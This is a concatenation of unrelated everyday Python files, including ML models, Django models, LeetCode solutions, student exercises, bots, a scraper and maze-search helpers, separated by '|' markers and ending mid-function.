y=np.array([0,0,0,1])
print(X.shape)
model = keras.Sequential([
keras.layers.Dense(4, input_shape=(X.shape[1],)),
keras.layers.Dense(8),
keras.layers.Dense(1)
])
model.compile(loss="mse") #Mean Square Error
model.summary()
model.fit(X, y, epochs=100, batch_size=1)
res = model.predict(X)
print(res)
print(res > 0.5)
|
#!/usr/bin/env python3
from threading import Thread, Condition
'''
1114. Print in Order
https://leetcode.com/problems/print-in-order/
'''
class Foo(object):
def __init__(self):
self.exec_condition = Condition()
self.order = 0
self.first_finish = lambda: self.order == 1
self.second_finish = lambda: self.order == 2
def printFirst(self):
print("First")
def printSecond(self):
print("Second")
def printThird(self):
print("Third")
def first(self, printFirst):
"""
:type printFirst: method
:rtype: void
"""
# printFirst() outputs "first". Do not change or remove this line.
with self.exec_condition:
printFirst()
self.order = 1
self.exec_condition.notify(2)
def second(self, printSecond):
"""
:type printSecond: method
:rtype: void
"""
# printSecond() outputs "second". Do not change or remove this line.
with self.exec_condition:
print(self.first_finish)
self.exec_condition.wait_for(self.first_finish)
printSecond()
self.order = 2
self.exec_condition.notify()
def third(self, printThird):
"""
:type printThird: method
:rtype: void
"""
# printThird() outputs "third". Do not change or remove this line.
with self.exec_condition:
self.exec_condition.wait_for(self.second_finish)
printThird()
def GetFuncName(l,ll, order):
orderList = []
funcNameList = []
for i in order:
orderList.append(l[i-1])
funcNameList.append(ll[i-1])
return orderList, funcNameList
if __name__ == "__main__" :
f = Foo()
l = [f.printFirst, f.printSecond, f.printThird]
ll = [f.first, f.second, f.third]
iList = [1, 3, 2]
orderList, funcName = GetFuncName(l,ll, iList)
'''
f.first(f.printSecond)
f.second(f.printFirst)
f.third(f.printThird)
'''
Thread(target=funcName[0], args = (orderList[0],)).start()
Thread(target=funcName[1], args = (orderList[1],)).start()
Thread(target=funcName[2], args = (orderList[2],)).start()
|
class Value:
"""Дескриптор данных, который устанавливает и возвращает
значение после вычитания комиссии.
"""
def __init__(self, amount=0):
self.amount = amount
def __get__(self, obj, obj_type):
return self.amount
def __set__(self, obj, value):
self.amount = value * (1 - obj.commission)
class Account:
amount = Value()
def __init__(self, commission):
self.commission = commission
def _main():
new_account = Account(0.2)
new_account.amount = 200
print(new_account.amount)
if __name__ == "__main__":
_main()
|
# -*- coding: utf-8 -*-
#吳驊涓/106111123
#第一題
"""
num=int(input("請輸入一個整數:"))
if (num % 3 == 0) and (num % 5 == 0):
print("%d 是三且五的倍數"%num)
elif num % 3 == 0:
print("%d 是三的倍數"%num)
elif num % 5 == 0:
print("%d 是五的倍數"%num)
else:
print("%d 非三與五的倍數"%num)
input()
"""
num=int(input("請輸入一個整數:"))
if (num % 3) == 0:
if (num % 5) == 0:
print("%d 是三且五的倍數"%num)
else:
print("%d 是三的倍數"%num)
else:
if (num % 5) == 0:
print("%d 是五的倍數"%num)
else:
print("%d 非三與五的倍數"%num)
input()
#---------------------------------------
#第二題
a=int(input("請輸入一個整數:"))
b=int(input("請輸入一個大於a的整數:"))
total=0
while a<=b:
if a % 3 == 0:
total = total+a
a = a + 1
print("三倍數的總合為 %d" %(total))
input()
|
# -*- coding: utf-8 -*-
'''
Crea un alumno en la base de datos.
cat /tmp/archivo.csv | PYTHONPATH="../../../python/model" python3 importStudents.py
'''
from model.connection import connection
from model.registry import Registry
import sys
if __name__ == '__main__':
import inject
#inject.configure()
r = inject.instance(Registry)
conn = connection.Connection(r.getRegistry('dcsys'))
con = conn.get()
try:
import createStudent
import csv
reader = csv.reader(sys.stdin)
for name, lastname, dni, sn in reader:
print('\n\n{} {} {} {}'.format(name,lastname,dni,sn))
createStudent.createStudent(con, dni, name, lastname, sn)
con.commit()
finally:
conn.put(con)
|
from big_xo.libs import *
class Player:
def __init__(self, bot, chat_id, name='Human'):
self.name = name
self.player_type = None
self.game = None
self.bot = bot
self.chat_id = chat_id
def set_type(self, player_type):
self.player_type = player_type
def set_game(self, game):
self.game = game
def up(self):
print("HumanPlayer: up()")
print(self.chat_id)
print(self.bot)
self.bot.sendMessage(
chat_id=self.chat_id,
text="Your turn\n{}".format(self.game.board.print_board()),
parse_mode='Markdown'
)
def move(self, cell):
self.game.make_a_move(self.player_type, cell)
class AI:
def __init__(self, bot, chat_id, name="AI"):
self.name = name
self.player_type = None
self.game = None
self.bot = bot
self.chat_id = chat_id
def set_type(self, player_type):
self.player_type = player_type
def set_game(self, game):
self.game = game
def up(self):
self.bot.sendMessage(
chat_id=self.chat_id,
text="{} has started thinking, wait for a couple of years, please.".format(self.name)
)
self.think()
def think(self):
my_scores, opponent_scores = score_game(self.game.board.board, self.player_type)
my_wi = get_max_element_index_from_2d_matrix(my_scores)
opponent_wi = get_max_element_index_from_2d_matrix(opponent_scores)
my_best_window = self.game.board.board[my_wi[0]: my_wi[0] + WINDOW_SIZE, my_wi[1]:my_wi[1] + WINDOW_SIZE]
opponent_best_window = self.game.board.board[opponent_wi[0]: opponent_wi[0] + WINDOW_SIZE,
opponent_wi[1]:opponent_wi[1] + WINDOW_SIZE]
my_best = find_best_move_within_window(my_best_window, self.player_type)
opponent_best = find_best_move_within_window(opponent_best_window, -1 * self.player_type)
t_board = np.copy(self.game.board.board)
t_board[my_best[0]] = self.player_type
_, _, diff1 = get_total_scores(*score_game(t_board, self.player_type))
t_board[my_best[0]] = 0
t_board[opponent_best[0]] = self.player_type
_, _, diff2 = get_total_scores(*score_game(t_board, self.player_type))
t_board[opponent_best[0]] = 0
if diff2 >= diff1:
final_move = opponent_best[0][0] + opponent_wi[0], opponent_best[0][1] + opponent_wi[1]
else:
final_move = my_best[0][0] + my_wi[0], my_best[0][1] + my_wi[1]
self.bot.sendMessage(
chat_id=self.chat_id,
text="{}: my move is {}".format(self.name, (final_move[0] + 1, final_move[1] + 1))
)
self.move(final_move)
def move(self, cell):
self.game.make_a_move(self.player_type, cell)
|
import discord
def getIdFromName(server : discord.Server, name : str) -> str:
for member in server.members:
if member.name == name:
return member.id
return ""
def getDiscriminatorFromName(server : discord.Server, name : str) -> str:
for member in server.members:
if member.name == name:
return member.discriminator
return ""
async def mention(client, dist, name : str, message : str) -> bool:
toId = getIdFromName(dist.server, name)
if toId != "":
await client.send_message(dist, "<@" + toId + "> " + message)
else:
return False
return True
|
#!/usr/bin/env python
#
# Copyright (c) 2019 Opticks Team. All Rights Reserved.
#
# This file is part of Opticks
# (see https://bitbucket.org/simoncblyth/opticks).
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""
::
OpRayleighTest # cfg4-
ORayleighTest # oxrap-
ipython -i OpRayleighTest.py
"""
X,Y,Z=0,1,2
OLDMOM,OLDPOL,NEWMOM,NEWPOL = 0,1,2,3
import os, numpy as np
import matplotlib.pyplot as plt
if __name__ == '__main__':
aa = np.load(os.path.expandvars("$TMP/RayleighTest/ok.npy"))
bb = np.load(os.path.expandvars("$TMP/RayleighTest/cfg4.npy"))
bins = 100
nx = 6
ny = 2
x0 = aa[:,NEWMOM,X]
y0 = aa[:,NEWMOM,Y]
z0 = aa[:,NEWMOM,Z]
a0 = aa[:,NEWPOL,X]
b0 = aa[:,NEWPOL,Y]
c0 = aa[:,NEWPOL,Z]
x1 = bb[:,NEWMOM,X]
y1 = bb[:,NEWMOM,Y]
z1 = bb[:,NEWMOM,Z]
a1 = bb[:,NEWPOL,X]
b1 = bb[:,NEWPOL,Y]
c1 = bb[:,NEWPOL,Z]
qwns = [
(1,x0),(2,y0),(3,z0),(4,a0),(5,b0),(6,c0),
(7,x1),(8,y1),(9,z1),(10,a1),(11,b1),(12,c1)
]
for i,q in qwns:
plt.subplot(ny, nx, i)
plt.hist(q, bins=bins)
pass
plt.show()
#dyz, ye, ze = np.histogram2d(y, z, bins=(100,100))
#extent = [ye[0], ye[-1], ze[0], ze[-1]]
#plt.imshow(dyz.T, extent=extent, origin='lower')
#plt.show()
|
counter = 100 # An integer assignment
miles = 1000.0 # A floating point
name = "John" # A string
print(counter)
print(miles)
print(name)
print("Aum")
mystring="Don't worry about spostrophes"
print(mystring)
hello="hello"
world="world"
helloworld=hello + " " + world
print(helloworld)
a,b=3, 4
print(a,b)
print("a is :", a)
squared = 7**2
cubed=2**3
print(squared)
print(cubed)
|
import txt2hpo, sys
import pickle
import os
class HPO_Class:
def __init__(self, _id=[], _name=[], _alt_id=[], _def=[], _comment=[], _synonym=[], _xref=[], _is_a=[],_alt_Hs={}, _chpo=[],_chpo_def=[]):
self._id = _id
self._name = _name
self._alt_id = _alt_id
self._def = _def
self._comment = _comment
self._synonym = _synonym
self._xref = _xref
self._is_a = _is_a
self._father=set()
self._child_self=set()
self._alt_Hs= _alt_Hs
self._chpo=_chpo
self._chpo_def=_chpo_def
#from CONFIG import *
#REALPATH = os.path.realpath(__file__).replace(__file__,'')
REALPATH='/home/zhangfeng/TXT2HPO/'
HPOs=txt2hpo.loading(REALPATH+'/src/HPOdata.pk')
input_dir=sys.argv[1]
chpo_dic_dir=REALPATH+'/src/chpo.txt'
split_punc_dir=REALPATH+'src/split_punc.txt'
rm_dir=REALPATH+'src/rmwords.txt'
rm_pro_dir=REALPATH+'src/rmwords_pro.txt'
output_dir=sys.argv[2]
mapping_list_dir=REALPATH+'src/mapping_list.txt'
elements=txt2hpo.splitting(input_dir, HPOs, chpo_dic_dir, split_punc_dir, rm_dir)
hpos=txt2hpo.mapping(elements, mapping_list_dir, HPOs)
fo=open(output_dir,'w')
fo.write('#Givern_term\n')
fo.write(open(input_dir).read().replace('\n','')+'\n')
fo.write('#Interpreted_term\tHPOs\n')
old=set()
given_hpos=[]
i=0
while i<len(elements):
if hpos[i] != ['None']:
fo.write(elements[i]+'\t'+','.join(hpos[i])+'\n')
for one in hpos[i]:
if one not in old:
old.add(one)
given_hpos.append([one,i])
i+=1
fo.write('#Given_HPO\tHPO_name\tHPO_name_cn\tElement\n')
i=0
while i<len(given_hpos):
hpo=given_hpos[i][0]
element=elements[given_hpos[i][1]]
if len(HPOs[hpo]._chpo )>0:
chpo=HPOs[hpo]._chpo[0]
else:
chpo='无'
fo.write(hpo+'\t'+HPOs[hpo]._name[0]+'\t'+chpo+'\t'+element+'\n')
i+=1
|
"""
from finance import views
try:
# django 2.0
from django.urls import path
except:
# django 1.6
from django.conf.urls import url as path
urlpatterns = [
path('finance/finance/budgetslist/', views.budgetslist, name='budgetslist'),
path('finance/budgetslist/finance/importbudgets/<str:docname>/', views.budgetslist, name='budgetslist'),
path('finance/importbudgets/<int:docname>/', views.importbudgets, name='importbudgets'),
path('finance/importbudgets/<str:docname>/', views.importbudgets, name='importbudgets'),
path('export/orders_from_project/<int:project_id>/', views.orders_from_project),
]
"""
|
from django.db import models
from login.models import NcUser
# 공지사항 + 개발로그 게시판
class NoticeDev(models.Model):
# primary_key
id = models.AutoField(auto_created=True, primary_key=True)
# 공지사항 게시판과 개발로그 게시판을 하나의 모델로 하고 board_name으로 구분한다.
noticedev_board_name = models.CharField(max_length=32, default='공지사항', verbose_name='게시판이름')
noticedev_title = models.CharField(max_length=128, verbose_name='제목')
noticedev_contents = models.TextField(verbose_name='글내용')
# 1대N관계의 관계성을 부여할 때 ForeignKey를 사용, 'N'쪽에 선언을 해준다
# object들간의 연결 : 관리자 유저와 NoticeBoard를 연결
# on_delete=models.CASCADE : '1'쪽 삭제시 연결된 'N'쪽의 모든 object들도 삭제됨
# on_delete=models.PROTECT : 'N'쪽의 데이터가 있을 경우 '1'쪽의 데이터가 삭제되지 않게 보호
noticedev_writer = models.ForeignKey('login.NcUser', on_delete=models.PROTECT, related_name='noticedev_writer', verbose_name='공지사항 작성자')
# noticedev_regist_dttm = models.DateTimeField(auto_now_add=True, verbose_name='최초 등록시간')
noticedev_regist_dttm = models.DateTimeField(auto_now_add=True, verbose_name='최초 등록시간')
noticedev_update_dttm = models.DateTimeField(auto_now=True, verbose_name='최근 업데이트시간')
# 0이상의 수를 취급하는 필드
# noticedev_hits = models.PositiveIntegerField(default=0, verbose_name='조회수')
noticedev_hits = models.PositiveIntegerField(default=0, verbose_name='조회수')
# 유저와 다대다 관계로 연결, 장고에서 자동으로 별도의 관계테이블을 생성해줌
# 한 모델안에 여러개의 동일한 외래키로 연결되어있으면, (이 경우 writer.NcUser와likes.NcUser)
# 장고가 구별하게끔 related_name을 등록해야함, '1'쪽(이 경우 NcUser)이 아닌 'N'쪽을 기준으로 네이밍한다.
noticedev_likes = models.ManyToManyField('login.NcUser', related_name='noticedev_likes',blank=True, verbose_name='좋아요')
def __str__(self):
return self.noticedev_title
class Meta:
db_table = 'nc_notice_noticedev'
verbose_name = '공지사항 게시판'
verbose_name_plural = '공지사항 게시판'
# 조회수 모델
class PostHits(models.Model):
# primary_key
id = models.AutoField(auto_created=True, primary_key=True)
# ip주소를 저장하는 필드
# protocol='both' : 'IPv4' 또는 'IPv6'형태를 저장함
# unpack_ipv4 : 매핑된 IPv4주소의 압축을 해제할지를 결정(매핑이 뭔지 모르겠음)
# null=True : 공백값을 허용
posthits_client_ip = models.GenericIPAddressField(protocol='both', unpack_ipv4=False, null=True, verbose_name='사용자 IP주소')
posthits_date = models.DateField(auto_now_add=True, verbose_name='조회날짜')
posthits_post = models.ForeignKey('NoticeDev', on_delete=models.CASCADE, verbose_name='조회수모델 게시글')
def __str__(self):
return self.posthits_post
class Meta:
db_table = 'nc_notice_hits'
verbose_name = '조회수'
verbose_name_plural = '조회수'
|
# count function
def count(str1, str2):
set_string1 = set(str1)
set_string2 = set(str2)
matched_characters = set_string1 & set_string2
print("No. of matching characters are : " + str(len(matched_characters)) )
# Main function
def main():
str1 ='3592' # first string
str2 ='1572' # second string
count(str1, str2) # calling count function
# Driver Code
if __name__=="__main__":
main()
|
class Solution:
def calculate(self, s: str) -> int:
return self.eval(s,0)[0]
def eval(self,s,i):
op = '+'
res = 0
while i < len(s):
char = s[i]
if char in ('+','-'):
op = char
else:
val = 0
if char.isdigit():
val = int(char)
elif char == '(':
(val, i) = self.eval(s, i+1)
if op == '+':
res += val
if op == '-':
res -= val
i += 1
return (res, i)
print(Solution().calculate('4-5+6'))
|
#!/usr/bin/env python
#-*-coding:utf-8-*-
# @File:Segment.py
# @Author: Michael.liu
# @Date:2019/2/12
# @Desc: NLP Segmentation ToolKit - Hanlp Python Version
print("Hello World!")
print("this is search & rec")
|
#!/usr/bin/python
from models.base import Base
import json
import unittest
from models.square import Square
from models.rectangle import Rectangle
import pep8
from os import path
class TestCodeFormat(unittest.TestCase):
def test_pep8_conformance(self):
"""Test that we conform to PEP8."""
pep8style = pep8.StyleGuide(quiet=True)
result = pep8style.check_files(['../../models/base.py'])
self.assertEqual(result.total_errors, 1,
"Found code style errors (and warnings).")
def test_pep8_conformance_test(self):
"""Test that we conform to PEP8."""
pep8style = pep8.StyleGuide(quiet=True)
result = pep8style.check_files(
['../../tests/test_models/test_base.py'])
self.assertEqual(result.total_errors, 1,
"Found code style errors (and warnings).")
class test_base(unittest.TestCase):
"""Tests for base class"""
def no_doc(item):
"""A decorator to add the no-doc docstring
objects that don't need any other documentation"""
t = "class" if inspect.isclass(item) else "function"
item.__doc__ = "This {} intentionally has no documentation".format(t)
def test_base(self):
"""Test base"""
base = Base(1)
self.assertEqual(base.id, 1)
def test_wrong(self):
"""Test base, there is only one exception raised for None"""
'''base = Base()
self.assertEqual(base.id, 1)'''
base2 = Base([1, 2, 3])
self.assertEqual(base2.id, [1, 2, 3])
base3 = Base("ate")
self.assertEqual(base3.id, "ate")
'''base4 = Base(None)
self.assertEqual(base4.id, 2)'''
base5 = Base(True)
self.assertEqual(base5.id, True)
def test_to_json_string(self):
"""Test function to_json_string that
converts a dict or list of dicts to a string"""
square = Square(1, 2, 3)
self.assertEqual(Base.to_json_string(None), "[]")
r1 = Rectangle(10, 7, 2, 8, 1)
r1_dict = r1.to_dictionary()
self.assertEqual(r1_dict, {'x': 2, 'width': 10,
'id': 1, 'height': 7, 'y': 8})
with self.assertRaises(TypeError):
Base.to_json_string()
def test_to_dictionary(self):
"""Test if the output is correct: it returns the class properties"""
r1 = Rectangle(10, 7, 0, 0)
r1_dict = r1.to_dictionary()
self.assertIs(type(r1_dict), dict)
def test_to_json_string(self):
"""Test for conversion of Base subclasses to json representation.
Assumes that subclasses have implemented `to_dictionary()` method.
If Rectangle class is not available do not run this test.
"""
self.assertEqual(Base.to_json_string(None), "[]")
self.assertEqual(Base.to_json_string([]), "[]")
with self.subTest():
r1 = Rectangle(10, 7, 2, 8, 1)
r1_dict = r1.to_dictionary()
json_dict = Base.to_json_string([r1_dict])
self.assertEqual(r1_dict, {'x': 2, 'width': 10,
'id': 1, 'height': 7,
'y': 8})
self.assertIs(type(r1_dict), dict)
self.assertIs(type(json_dict), str)
self.assertEqual(json.loads(json_dict), json.loads('[{"x": 2, '
'"width": 10, '
'"id": 1, '
'"height": 7, '
'"y": 8}]'))
def test_create_rectangle_original(self):
"""Test for function create that returns an instance of a class"""
r1 = Rectangle(3, 5, 1, 2, 7)
r1_dictionary = r1.to_dictionary()
r2 = Rectangle.create(**r1_dictionary)
self.assertEqual("[Rectangle] (7) 1/2 - 3/5", str(r1))
def test_create_rectangle_new(self):
"""Test if new values are assigned to the new instance"""
r1 = Rectangle(3, 5, 1, 2, 7)
r1_dictionary = r1.to_dictionary()
r2 = Rectangle.create(**r1_dictionary)
self.assertEqual("[Rectangle] (7) 1/2 - 3/5", str(r2))
def test_create_rectangle_is(self):
"""Test if both class instances are the same"""
r1 = Rectangle(3, 5, 1, 2, 7)
r1_dictionary = r1.to_dictionary()
r2 = Rectangle.create(**r1_dictionary)
self.assertIsNot(r1, r2)
def test_create_rectangle_equals(self):
"""Test if both class instances are the same"""
r1 = Rectangle(3, 5, 1, 2, 7)
r1_dictionary = r1.to_dictionary()
r2 = Rectangle.create(**r1_dictionary)
self.assertNotEqual(r1, r2)
def test_create_square_original(self):
""""Test for function create that returns an instance of a class"""
s1 = Square(3, 5, 1, 7)
s1_dictionary = s1.to_dictionary()
s2 = Square.create(**s1_dictionary)
self.assertEqual("[Square] (7) 5/1 - 3", str(s1))
def test_create_square_new(self):
"""Test if new values are assigned to the new instance"""
s1 = Square(3, 5, 1, 7)
s1_dictionary = s1.to_dictionary()
s2 = Square.create(**s1_dictionary)
self.assertEqual("[Square] (7) 5/1 - 3", str(s2))
def test_create_square_is(self):
"""Test if both class instances are the same"""
s1 = Square(3, 5, 1, 7)
s1_dictionary = s1.to_dictionary()
s2 = Square.create(**s1_dictionary)
self.assertIsNot(s1, s2)
def test_create_square_equals(self):
"""Test if values are the same between both dictionaries"""
s1 = Square(3, 5, 1, 7)
s1_dictionary = s1.to_dictionary()
s2 = Square.create(**s1_dictionary)
self.assertNotEqual(s1, s2)
def test_load_from_file(self):
"""With a class"""
r1 = Rectangle(2, 3)
if not path.exists("Rectangle.json"):
lists = Rectangle.load_from_file()
self.assertEqual(lists, [])
def test_load_from_existing_file(self):
"""Tests if function loads from existing file"""
r1 = Rectangle(3, 4)
r1_json = Rectangle.save_to_file([r1])
with open("Rectangle.json", "r") as f:
self.assertEqual([r1.to_dictionary()], json.load(f))
def test_load_from_existing_file_(self):
"""Tests if function loads from existing file"""
r1 = Square(3)
r1_json = Square.save_to_file([r1])
with open("Square.json", "r") as f:
self.assertEqual([r1.to_dictionary()], json.load(f))
def test_load_from_file_(self):
"""With a class"""
r1 = Square(2)
if not path.exists("Square.json"):
lists = Square.load_from_file()
self.assertEqual(lists, [])
def test_save_to_file(self):
"""Tests if function saves into a file"""
s1 = Square(3)
s1_json = Square.save_to_file([s1])
with open("Square.json", "r") as f:
self.assertEqual([s1.to_dictionary()], json.load(f))
|
from app.utils.constant import GCN_VAE, SUPPORTS, MODE, TRAIN, NORMALISATION_CONSTANT, LOSS, ACCURACY
from app.model.aemodel import base_model
from app.layer.GC import SparseGC
from app.layer.IPD import InnerProductDecoder
import tensorflow as tf
import numpy as np
class Model(base_model.Base_Model):
'''Class for GCN Model'''
def __init__(self, model_params, sparse_model_params, placeholder_dict, autoencoder_model_params):
super(Model, self).__init__(model_params=model_params,
sparse_model_params=sparse_model_params,
placeholder_dict=placeholder_dict,
autoencoder_model_params = autoencoder_model_params)
self.name = GCN_VAE
# We feed in the adjacency matrix in the sparse format and then make it dense
# We need the mode variable to know if we need to use the mask values.
# Since we use almost the entire adjacency matrix at training time, it is inefficient to use a mask
# parameter at training time.
self.mean_encoding = None
self.log_sigma_encoding = None
self.mean_encoder = None
self.log_sigma_encoder = None
self.z = None
self.decoder = None
self.node_count = autoencoder_model_params.node_count
self.model_op()
def _loss_op(self):
'''Operator to compute the loss for the model.
This method should not be directly called the variables outside the class.
Note we do not need to initialise the loss as zero for each batch as process the entire data in just one batch.'''
# Computing the KL loss analytically boils down to KL divergence between two gaussians as
# computed here: https://arxiv.org/pdf/1312.6114.pdf (page 11)
# Why do we have a normalisation constant in the kl_loss?
# The reconstruction loss was normalized with respect to both the input size (node_count)
# and input dimensionality (again node_count as it is basically an adjacency matrix).
# So we normalize one more time with respect to node_count
kl_loss = 0.5 * tf.reduce_mean(input_tensor=(tf.reduce_sum(input_tensor=(-2*self.log_sigma_encoding
+ tf.square(tf.exp(self.log_sigma_encoding))
+ tf.square(self.mean_encoding)
- 1),
axis=1)))/self.node_count
liklihood_loss = super(Model, self)._loss_op()
return liklihood_loss + kl_loss
def _mean_encoder_op(self):
'''Component of the encoder op which learns the mean'''
return SparseGC(input_dim=self.model_params.hidden_layer1_size,
output_dim=self.model_params.hidden_layer2_size,
supports=self.supports,
dropout_rate=self.dropout_rate,
activation=lambda x: x,
sparse_features=False,
num_elements=self.num_elements)
def _log_sigma_encoder_op(self):
'''Component of the encoder op which learns the log of sigma'''
return SparseGC(input_dim=self.model_params.hidden_layer1_size,
output_dim=self.model_params.hidden_layer2_size,
supports=self.supports,
dropout_rate=self.dropout_rate,
activation=lambda x: x,
sparse_features=False,
num_elements=self.num_elements)
def _layers_op(self):
'''Operator to build the layers for the model.
This function should not be called by the variables outside the class and
is to be implemented by all the subclasses.
This function implemenetation is different from the other _layer_ops as now our model is not sequential.'''
self.layers.append(SparseGC(input_dim=self.input_dim,
output_dim=self.model_params.hidden_layer1_size,
supports=self.supports,
dropout_rate=self.dropout_rate,
activation=tf.nn.relu,
sparse_features=self.model_params.sparse_features,
num_elements=self.num_elements))
self.mean_encoder = self._mean_encoder_op()
self.log_sigma_encoder = self._log_sigma_encoder_op()
self.decoder = InnerProductDecoder(input_dim=self.input_dim,
output_dim=self.input_dim,
dropout_rate=self.dropout_rate,
activation=lambda x: x,
sparse_features=False)
# The output of the GCN-AE model is always an adjacency matrix
def model_op(self):
'''Operator to build the network.
This function should be called by the variables outside the class.
We can not use the model_op from the base class as now it is not just a sequential model.'''
scope_name = self.name + "_var_to_save"
with tf.variable_scope(name_or_scope=scope_name):
self._layers_op()
self.vars = {var.name: var for var in
tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, scope=scope_name)}
# self._save_op()
self.activations = [self.inputs]
for layer in self.layers:
self.activations.append(
layer(self.activations[-1])
)
# Activations is a list of the form input::first_common_hidden_layer::..::last_common_hidden_layer
self.mean_encoding = self.mean_encoder(self.activations[-1])
self.log_sigma_encoding = self.log_sigma_encoder(self.activations[-1])
self.z = tf.random_normal(shape=[self.node_count, self.model_params.hidden_layer2_size],
mean=self.mean_encoding,
stddev=tf.exp(self.log_sigma_encoding))
self.outputs = self.decoder(self.z)
self._compute_metrics()
self.optimizer_op = self._optimizer_op()
def _compute_metrics(self):
'''Method to compute the metrics of interest'''
self.predictions = self._prediction_op()
self.loss = self._loss_op()
self.accuracy = self._accuracy_op()
self.embeddings = self.z
tf.summary.scalar(LOSS, self.loss)
tf.summary.scalar(ACCURACY, self.accuracy)
self.summary_op = tf.summary.merge_all()
|
from datetime import datetime
def timer(func):
def wrapper(*args, **kwargs):
start = datetime.now()
result = func(*args, **kwargs)
# result = func(*args, **kwargs)
end = datetime.now()
print(func.__qualname__, args, "took \t\t",
(end-start).total_seconds() * 1000, "miliseconds")
return result
return wrapper
def timer_noresult(func):
def wrapper(*args, **kwargs):
start = datetime.now()
result = list(func(*args, **kwargs))
# result = func(*args, **kwargs)
end = datetime.now()
# print(func.__qualname__, args, "took \t\t",
# (end-start).microseconds/1000, "milliseconds")
return (end-start).total_seconds() * 1000
return wrapper
|
# -*- coding: UTF-8 -*-
import datetime
from urllib import request
from bs4 import BeautifulSoup
if __name__ == "__main__":
url = 'https://petitions.whitehouse.gov/'
req = request.Request(url)
response = request.urlopen(req)
html = response.read().decode('utf-8')
# 创建Beautiful Soup对象
soup = BeautifulSoup(html, 'lxml')
tag = soup.find(attrs={"data-nid": "2545476"})
count = tag.find("span", attrs={"class": "signatures-number"}).string
now = datetime.datetime.now()
dead_line = datetime.datetime.strptime(
'2017-06-18', '%Y-%m-%d')
delta = dead_line - now
per = (30 - delta.days) / 30 * 100
print(" all_count : %s" % count)
print("remain_days : %d" % delta.days)
print(" percent : %.2f%%" % per)
|
# Generated by Django 2.1.3 on 2018-11-06 10:43
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('core', '0017_staff'),
]
operations = [
migrations.AddField(
model_name='staff',
name='date_joined',
field=models.DateTimeField(auto_now_add=True, null=True),
),
migrations.AddField(
model_name='staff',
name='security_group',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, to='core.SecurityGroup'),
),
migrations.AlterField(
model_name='staff',
name='email',
field=models.EmailField(max_length=254, unique=True),
),
]
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Thu May 3 01:36:01 2018
@author: Iswariya Manivannan
"""
import os, sys
def maze_map_to_tree(maze_map):
"""Function to create a tree from the map file. The idea is
to check for the possible movements from each position on the
map and encode it in a data structure like list.
Parameters
----------
maze_map : list
The list of the text
Returns
-------
dict_tree :dictionary
The keys of the dictionary are a tuple (row,col) representing the parent node.
The values are the list of tuples (row,col) representing the corresponding children nodes.
The list starts with the left node and ends at down node travelling clockwise
"""
dict_tree = {}
for row in range(0, len(maze_map)):
for col in range(0, len(maze_map[row])):
if maze_map[row][col] == ' ' or 's':
left = (row, col - 1)
right = (row, col + 1)
up = (row - 1, col)
down = (row + 1, col)
dict_tree.update({(row, col): [left, up, right, down]})
return dict_tree
def assign_character_for_nodes(maze_map, current_node, prev_node):
"""Function to assign character for the visited nodes. Please assign
meaningful characters based on the direction of tree traversal.
Parameters
----------
maze_map : list
The maze map is inserted as list of lists
current_node : tuple
It defines the current position in the map
prev_node : tuple
It defines the previous position in the map
Returns
-------
list
The maze_map list is printed with the unicode character representing the direction at current node
"""
direction = (current_node[0] - prev_node[0], current_node[1] - prev_node[1])
str1 = maze_map[current_node[0]]
list1 = list(str1)
print(list1)
if direction == (-1, 0) and maze_map[current_node[0]][current_node[1]] == ' ':
# up unicode
list1[current_node[1]] = '\u2534'
str1 = ''.join(list1)
elif direction == (0, 1) and maze_map[current_node[0]][current_node[1]] == ' ':
# right unicode
list1[current_node[1]] = '\u251c'
str1 = ''.join(list1)
elif direction == (1, 0) and maze_map[current_node[0]][current_node[1]] == ' ':
# down unicode
list1[current_node[1]] = '\u252c'
str1 = ''.join(list1)
elif direction == (0, -1) and maze_map[current_node[0]][current_node[1]] == ' ':
# left unicode
list1[current_node[1]] = '\u2524'
str1 = ''.join(list1)
maze_map[current_node[0]] = str1
return maze_map
def write_to_file(file_name, path):
"""Function to write output to console and a txt file.
Please ensure that it should ALSO be possible to visualize each and every
step of the tree traversal algorithm in the map in the console.
This enables understanding towards the working of your
tree traversal algorithm as to how it reaches the goals.
Parameters
----------
filen_name : string
This parameter defines the name of the txt file.
path : [type]
[description]
"""
with open(file_name, 'w') as f:
for item in path:
f.write("%s" % item)
def start_pose(maze_map):
'''
:param maze_map: list
The list of the text
:return: tuple
The tuple (row,col) where the source is present
'''
for row in range(0, len(maze_map)):
for col in range(0, len(maze_map[row])):
if maze_map[row][col] == 's':
return (row, col)
def print_maze(maze_map):
'''
Printing the maze_map list in columns for better visualization
:param maze_map: list
Input the maze_map as list
:return: None
'''
for row in maze_map:
print(row, end='')
def clear_screen():
os.system('cls' if os.name == 'nt' else 'clear')
|
# -*- coding: utf-8 -*-
import NaoCreator.Tool.wikipediator as w
import NaoCreator.Tool.speech_move as sm
import NaoCreator.SpeechToText.nao_listen as nl
import NaoSensor.outils as o
import NaoSensor.plant as p
def get_wikipedia_answer(info):
"""
Permet de faire la recherche sur wikipédia et de donner la première phrase de la page wikipédia
correspondante à la question posée par l'utilisateur.
:param info: message dit par l'utilisateur
:return:
"""
sm.speech_and_move(u"Désolé cette information m'est inconnue, je te redirige sur wikipédia.")
try:
resum = w.get_resum(info, w.FRENCH).split(".")
sm.speech_and_move(u"Voici la réponse a ta question. {}".format(resum[0]))
except Exception as e:
sm.speech_and_move(u"Je n'ai pas réussi à trouver la réponse à ta question sur Wikipédia !")
def explication(msg):
"""
Regarde si le message contient un fichier dans nos bases de données.
:param msg: message dit par l'utilisateur
:return:
"""
list = p.Plant.get_plantes_obj()
list2 = o.Outils.get_outils_obj()
redirection = False
#On parcourt nos deux listes à la recherche d'un mot correspondant au nom dun de nos fichiers dans nos bdd
for item in list + list2:
if item.get_data("nom") in msg:
explication_obj(msg, item)
redirection = True
break
#Si on ne trouve pas de mot correspondant, on renvoi sur wikipédia
if not redirection:
get_wikipedia_answer(msg)
def explication_obj(msg, obj):
"""
